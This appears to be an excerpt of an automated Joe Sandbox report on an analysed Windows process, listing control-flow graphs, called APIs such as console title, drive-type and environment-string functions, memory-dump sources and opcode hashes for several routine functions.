                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 992 7ff706ebc620-7ff706ebc66f GetConsoleTitleW 993 7ff706ebc675-7ff706ebc687 call 7ff706ebaf14 992->993 994 7ff706ecc5f2 992->994 998 7ff706ebc689 993->998 999 7ff706ebc68e-7ff706ebc69d call 7ff706ebca40 993->999 996 7ff706ecc5fc-7ff706ecc60c GetLastError 994->996 1000 7ff706ecc5e3 call 7ff706eb3278 996->1000 998->999 1004 7ff706ecc5e8-7ff706ecc5ed call 7ff706ec855c 999->1004 1005 7ff706ebc6a3-7ff706ebc6ac 999->1005 1000->1004 1004->994 1007 7ff706ebc6b2-7ff706ebc6c5 call 7ff706ebb9c0 1005->1007 1008 7ff706ebc954-7ff706ebc95e call 7ff706ec291c 1005->1008 1015 7ff706ebc9b5-7ff706ebc9b8 call 7ff706ec5c6c 1007->1015 1016 7ff706ebc6cb-7ff706ebc6ce 1007->1016 1013 7ff706ebc964-7ff706ebc96b call 7ff706eb89c0 1008->1013 1014 7ff706ecc5de-7ff706ecc5e0 1008->1014 1020 7ff706ebc970-7ff706ebc972 1013->1020 1014->1000 1023 7ff706ebc9bd-7ff706ebc9c9 call 7ff706ec855c 1015->1023 1016->1004 1018 7ff706ebc6d4-7ff706ebc6e9 1016->1018 1021 7ff706ecc616-7ff706ecc620 call 7ff706ec855c 1018->1021 1022 7ff706ebc6ef-7ff706ebc6fa 1018->1022 1020->996 1024 7ff706ebc978-7ff706ebc99a towupper 1020->1024 1026 7ff706ecc627 1021->1026 1025 7ff706ebc700-7ff706ebc713 1022->1025 1022->1026 1037 7ff706ebc9d0-7ff706ebc9d7 1023->1037 1029 7ff706ebc9a0-7ff706ebc9a9 1024->1029 1030 7ff706ecc631 1025->1030 1031 7ff706ebc719-7ff706ebc72c 1025->1031 1026->1030 1029->1029 1034 7ff706ebc9ab-7ff706ebc9af 1029->1034 1036 7ff706ecc63b 1030->1036 1035 7ff706ebc732-7ff706ebc747 call 7ff706ebd3f0 1031->1035 1031->1036 1034->1015 1038 7ff706ecc60e-7ff706ecc611 call 7ff706edec14 1034->1038 1045 7ff706ebc74d-7ff706ebc750 1035->1045 1046 7ff706ebc8ac-7ff706ebc8af 1035->1046 1042 7ff706ecc645 1036->1042 1040 7ff706ebc872-7ff706ebc8aa call 7ff706ec855c call 7ff706ec8f80 1037->1040 1041 7ff706ebc9dd-7ff706ecc6da SetConsoleTitleW 1037->1041 1038->1021 1041->1040 1053 7ff706ecc64e-7ff706ecc651 1042->1053 1049 7ff706ebc752-7ff706ebc764 call 7ff706ebbd38 1045->1049 1050 7ff706ebc76a-7ff706ebc76d 1045->1050 1046->1045 1052 7ff706ebc8b5-7ff706ebc8d3 wcsncmp 1046->1052 1049->1004 1049->1050 1056 7ff706ebc840-7ff706ebc84b call 7ff706ebcb40 1050->1056 1057 7ff706ebc773-7ff706ebc77a 1050->1057 1052->1050 1058 7ff706ebc8d9 1052->1058 1059 7ff706ecc657-7ff706ecc65b 1053->1059 1060 7ff706ebc80d-7ff706ebc811 1053->1060 1077 7ff706ebc856-7ff706ebc86c 1056->1077 1078 7ff706ebc84d-7ff706ebc855 call 7ff706ebcad4 1056->1078 1065 7ff706ebc780-7ff706ebc784 1057->1065 1058->1045 1059->1060 1061 7ff706ebc9e2-7ff706ebc9e7 1060->1061 1062 7ff706ebc817-7ff706ebc81b 1060->1062 1061->1062 1069 7ff706ebc9ed-7ff706ebc9f7 call 7ff706ec291c 1061->1069 1067 7ff706ebc821 1062->1067 1068 7ff706ebca1b-7ff706ebca1f 1062->1068 1070 7ff706ebc78a-7ff706ebc7a4 wcschr 1065->1070 1071 7ff706ebc83d 1065->1071 1073 7ff706ebc824-7ff706ebc82d 1067->1073 1068->1067 1079 7ff706ebca25-7ff706ecc6b3 call 7ff706eb3278 1068->1079 1087 7ff706ecc684-7ff706ecc698 call 7ff706eb3278 1069->1087 1088 7ff706ebc9fd-7ff706ebca00 1069->1088 1075 7ff706ebc7aa-7ff706ebc7ad 1070->1075 1076 7ff706ebc8de-7ff706ebc8f7 1070->1076 1071->1056 1073->1073 1080 7ff706ebc82f-7ff706ebc837 1073->1080 1082 7ff706ebc7b0-7ff706ebc7b8 1075->1082 1083 7ff706ebc900-7ff706ebc908 1076->1083 1077->1037 1077->1040 1078->1077 1079->1004 1080->1065 1080->1071 1082->1082 1089 7ff706ebc7ba-7ff706ebc7c7 1082->1089 1083->1083 1090 7ff706ebc90a-7ff706ebc915 1083->1090 1087->1004 1088->1062 1094 7ff706ebca06-7ff706ebca10 call 7ff706eb89c0 1088->1094 1089->1053 1095 7ff706ebc7cd-7ff706ebc7db 1089->1095 1096 7ff706ebc93a-7ff706ebc944 1090->1096 1097 7ff706ebc917 1090->1097 1094->1062 1113 7ff706ebca16-7ff706ecc67f GetLastError call 7ff706eb3278 1094->1113 1102 7ff706ebc7e0-7ff706ebc7e7 1095->1102 1099 7ff706ebca2a-7ff706ebca2f call 7ff706ec9158 1096->1099 1100 7ff706ebc94a 1096->1100 1103 7ff706ebc920-7ff706ebc928 1097->1103 1099->1014 1100->1008 1106 7ff706ebc800-7ff706ebc803 1102->1106 1107 7ff706ebc7e9-7ff706ebc7f1 1102->1107 1108 7ff706ebc932-7ff706ebc938 1103->1108 1109 7ff706ebc92a-7ff706ebc92f 1103->1109 1106->1042 1111 7ff706ebc809 1106->1111 1107->1106 1114 7ff706ebc7f3-7ff706ebc7fe 1107->1114 1108->1096 1108->1103 1109->1108 1111->1060 1113->1004 1114->1102 1114->1106
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleTitlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /$:$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2364928044-4063957050
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cdef8811c7da3924b11e5a175cac4be91fba1452734177d3531fa0845580e7f0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC19E61A1C74281FA64BB25DC242BBE2A1FF91F94FE46231DA1E472D5DF7CE8458320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB89C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1171 7ff706eb89c0-7ff706eb8a3d memset call 7ff706ebca40 1174 7ff706eb8a43-7ff706eb8a71 GetDriveTypeW 1171->1174 1175 7ff706eb8ace-7ff706eb8adf 1171->1175 1176 7ff706ecb411-7ff706ecb422 1174->1176 1177 7ff706eb8a77-7ff706eb8a7a 1174->1177 1178 7ff706eb8ae1-7ff706eb8ae8 ??_V@YAXPEAX@Z 1175->1178 1179 7ff706eb8aed 1175->1179 1180 7ff706ecb424-7ff706ecb42b ??_V@YAXPEAX@Z 1176->1180 1181 7ff706ecb430-7ff706ecb435 1176->1181 1177->1175 1182 7ff706eb8a7c-7ff706eb8a7f 1177->1182 1178->1179 1183 7ff706eb8aef-7ff706eb8b16 call 7ff706ec8f80 1179->1183 1180->1181 1181->1183 1182->1175 1185 7ff706eb8a81-7ff706eb8ac8 GetVolumeInformationW 1182->1185 1185->1175 1187 7ff706ecb3fc-7ff706ecb40b GetLastError 1185->1187 1187->1175 1187->1176
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 850181435-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a2dfd22914faaee84c5ebf64896b17a8da57df17c6a2113f2e9396a5a78d2c2f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1379ede723eac65afdf39bc4f10c7cd7bacbf823c50ad72477e63a898fb5baf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1418F32608BC1CAE7609F20DC542EBB7A4FF89B49F945125DA4D4BB48CF38D546CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC8D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1188 7ff706ec8d80-7ff706ec8da2 1189 7ff706ec8da4-7ff706ec8daf 1188->1189 1190 7ff706ec8db1-7ff706ec8db4 1189->1190 1191 7ff706ec8dcc 1189->1191 1192 7ff706ec8db6-7ff706ec8dbd 1190->1192 1193 7ff706ec8dbf-7ff706ec8dca Sleep 1190->1193 1194 7ff706ec8dd1-7ff706ec8dd9 1191->1194 1192->1194 1193->1189 1195 7ff706ec8ddb-7ff706ec8de5 _amsg_exit 1194->1195 1196 7ff706ec8de7-7ff706ec8def 1194->1196 1197 7ff706ec8e4c-7ff706ec8e54 1195->1197 1198 7ff706ec8e46 1196->1198 1199 7ff706ec8df1-7ff706ec8e0a 1196->1199 1200 7ff706ec8e73-7ff706ec8e75 1197->1200 1201 7ff706ec8e56-7ff706ec8e69 _initterm 1197->1201 1198->1197 1202 7ff706ec8e0e-7ff706ec8e11 1199->1202 1203 7ff706ec8e80-7ff706ec8e88 1200->1203 1204 7ff706ec8e77-7ff706ec8e79 1200->1204 1201->1200 1205 7ff706ec8e13-7ff706ec8e15 1202->1205 1206 7ff706ec8e38-7ff706ec8e3a 1202->1206 1207 7ff706ec8eb4-7ff706ec8ec8 call 7ff706ec37d8 1203->1207 1208 7ff706ec8e8a-7ff706ec8e98 call 7ff706ec94f0 1203->1208 1204->1203 1209 7ff706ec8e3c-7ff706ec8e41 1205->1209 1210 7ff706ec8e17-7ff706ec8e1b 1205->1210 1206->1197 1206->1209 1217 7ff706ec8ecd-7ff706ec8eda 1207->1217 1208->1207 1218 7ff706ec8e9a-7ff706ec8eaa 1208->1218 1211 7ff706ec8f28-7ff706ec8f3d 1209->1211 1213 7ff706ec8e2d-7ff706ec8e36 1210->1213 1214 7ff706ec8e1d-7ff706ec8e29 1210->1214 1213->1202 1214->1213 1220 7ff706ec8ee4-7ff706ec8eeb 1217->1220 1221 7ff706ec8edc-7ff706ec8ede exit 1217->1221 1218->1207 1222 7ff706ec8eed-7ff706ec8ef3 _cexit 1220->1222 1223 7ff706ec8ef9 1220->1223 1221->1220 1222->1223 1223->1211
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4291973834-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 43c635820e7093ad927d14dc742e0d53afb63bf360faaca3e0890e8d8404c32f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA412839E08B4786FB50BB10EE6027BABA0BF54368FC41436D91D476A4DF7CE8458764
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1224 7ff706ec4a14-7ff706ec4a3e GetEnvironmentStringsW 1225 7ff706ec4a40-7ff706ec4a46 1224->1225 1226 7ff706ec4aae-7ff706ec4ac5 1224->1226 1227 7ff706ec4a59-7ff706ec4a8f GetProcessHeap HeapAlloc 1225->1227 1228 7ff706ec4a48-7ff706ec4a52 1225->1228 1230 7ff706ec4a91-7ff706ec4a9a memmove 1227->1230 1231 7ff706ec4a9f-7ff706ec4aa9 FreeEnvironmentStringsW 1227->1231 1228->1228 1229 7ff706ec4a54-7ff706ec4a57 1228->1229 1229->1227 1229->1228 1230->1231 1231->1226
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1623332820-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b8879f185e72891e3b07a1b34119d03775725cce98bdb9dd7de49bc877eabc3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bedbd02b2e83685aab04dae624747bec3d3f04209153fba6c5d2bef1ca8d2a3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75115126A15B52C2DA10AB55BC2413AFBE0FF89F94B999034DE4E03784EF3DE4428764
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1826527819-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23256dfd2f732df175e6b73b052b73006fca6669f12a3d168bc46ea9cf5c2c03
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42012D35908B82CAE6047B55AC641BAFA61FF8A759FC45174D54F07396DF3C90448B60
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2EFC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4254246844-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cf17374396e63ede5004fa905e84dade694dcee29536d7e8384d2144511f5058
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C541B622A0874286EE10AB00EC6537BE7A0FF95BA4FD58530DE5E47785EF3CE5428720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC1EA0: wcschr.MSVCRT(?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF706EE0D54), ref: 00007FF706EC1EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF706EB92AC), ref: 00007FF706EC30CA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF706EC30DD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC30F6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF706EC3106
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
